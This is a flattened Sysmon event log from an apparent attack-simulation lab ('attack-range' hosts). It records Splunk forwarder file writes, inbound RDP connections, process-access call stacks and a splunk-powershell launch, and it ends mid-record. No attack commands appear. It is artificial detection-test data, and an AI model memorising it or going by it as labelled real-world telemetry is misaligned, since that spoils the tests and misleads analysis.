Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DA00C702EC98CF5AF364BEB957BFD06F,SHA256=26F522B176D0B008B264B256B42C191AC57218DC86055401F07AE44084715EAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:08.584{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B1B652D2068C3059BD265685258E2D5D,SHA256=172BE58A80F58D7106333E5C43E8ACE70A97A04CF42A9A2104ECD178620ABB53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:09.845{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E771744978F7433A91F4DD03CB23C7F,SHA256=68E5ECCFCF0B488E869509570EAE9B5DFBCF029B89393455D6E9F581F24DF8E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:09.159{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8CA95411A46F290B61581FA4674CCA9,SHA256=3741756D4F1D40BD0EBB0A44577BCC77F32B7F4E43424F1B07974A595EE4E3EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:10.866{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CEF3802C28D3ED98A85B18AAED9CCA7,SHA256=4AD1775A73196199D23AE80C3C31D903528B11CCE0512BA881B5F06BB441939E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:08.143{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx52004-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:10.174{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=685048204AFB1075E6CBAB6249975E1B,SHA256=C851A651F9657F99DCB92C01DEC2088C863A0A3794C1B14AF2EBC1BDE1C11683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:11.882{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1149104FB13C61D3228640095FAFEE0,SHA256=D815FCF94879531CE1AF3AC606E621413ED461185DF6E52CCC3FDBA62F924A06,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:09.514{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51498-false10.0.1.12-8000- 23542300x8000000000000000219078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:11.674{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32BAA2D37E20129B36194F0785138881,SHA256=BB55B4961AC0DAD89CBE6FAB671A48ED2A05AA7D38994DF3BAFB8EC26E0982D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:11.252{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F4217B6F72BBD8FA068BED1909C4CC,SHA256=7CA4F21B2A7971A6558CA73B9E654F632C50707225AA6DD34288B21A6793E79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:12.897{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C198F82E2F0296545E59AB79825B1BE8,SHA256=E09B9665CB4424A1D4E629BCBBC3A5DE12B264E29DF0CC869DA1BD36A9776986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:12.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=133A02C088BEDB8F7312FEB9693F470C,SHA256=AC96F28068EB9EE8BD6CEF10BE6F656C0E5FE437F49437CBCD7E6E7739D27DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:13.943{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71ACA6C72926571F88923CAE755832B2,SHA256=462039D7EA41BA123457DEEA1C86DDE3EF1B5EF219E8538D46ADDEE7EF67D370,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:13.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A43B8D8EBF7A19EABDCC5E6152D41EFA,SHA256=630C9C3F937E6610FEAC282D0B588BD37699C20293C8B26A486832EAAA289C9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:14.980{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FDD26162AEF67DC92F3C8E67DA72883,SHA256=E85111F16673528835A1770EF277C02265CB085E14293BE795EFCA2B728041F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:12.106{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53816-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:14.455{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A295253C79A3B2758FB61D08488F88,SHA256=B2B9422A888527CECA202F19992791D234A0009E69381F0E4BCB56C5288EB22A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:12.586{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49184-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:15.982{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAC0A1DA078E22F6B3AE2CEB4E867C50,SHA256=231C8C4F008AAEEB063F13A1CB29C85BA012690F7ACE483C9276C09DCD938EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:15.768{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A34BB7937761F0F9CBC62C1BC4E198D3,SHA256=51C561AB96785851D7C5F78B58DE852E1D451217FB96E739F9A34F8E6073E97D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:15.471{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DBE1FD59640BA3745C6FF1B26E3C481,SHA256=DEE9126CEC8BEC9A00E65EAD997C8680E4F66343D3BFA721E0CFEF5A3D3A534E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:16.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7A1A8D4E72F063B6C2518C25EA37F0,SHA256=C24569DD4CD327764EB96EB378DAF5E8CFE637336150ABCE2DF06393859D719F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:16.533{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0CDA9DAAD0E2046A0827E4C16BD6F0B,SHA256=60CE91C5858E6124ED7EBCEA26C2D1E40567154814DB026CC3851CAD6BB7B529,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:16.162{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54690-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:14.638{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51499-false10.0.1.12-8000- 23542300x8000000000000000219087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:17.549{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C30FCE675DD4C876E3B7D23DD26076A2,SHA256=F794E716D67D9ABD16C21FA86CE48DBF791617B832AE0314218D7F9413B595FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:17.514{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=78EED1C70996E1BFD5B40E1A51EC00B7,SHA256=DF179A8B082419335AEF3DC859CF1EC33629F97B3B23FDD518778CE2C341FA95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:17.514{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DA00C702EC98CF5AF364BEB957BFD06F,SHA256=26F522B176D0B008B264B256B42C191AC57218DC86055401F07AE44084715EAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:18.550{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDF2B7A0FDC4E273A41AEC952BC1E873,SHA256=B02AB50C9BF2C07D6256056ACF0642C61FD7C7750C70992B7FF9E004D4C18977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:17.995{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46DEA86FEB24538BAB694FF88D2D6E5C,SHA256=C65D5FEC3BE291BDCC5410CAF002E49DE2EED16990D12119A0FA3EA495474382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:18.131{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-147MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:19.563{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64065BC77D308C7E573DA73196421B2,SHA256=82EF29528CC9A80622C637CDECB2C128A21A127DDC591FD97D5443D65BA07FD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.881{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14B3-6216-A706-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.879{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.879{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.879{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.879{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.878{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-14B3-6216-A706-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.878{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14B3-6216-A706-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.876{C8EA50B7-14B3-6216-A706-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.679{C8EA50B7-14B3-6216-A606-000000003802}61606900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:19.281{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14B3-6216-A606-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 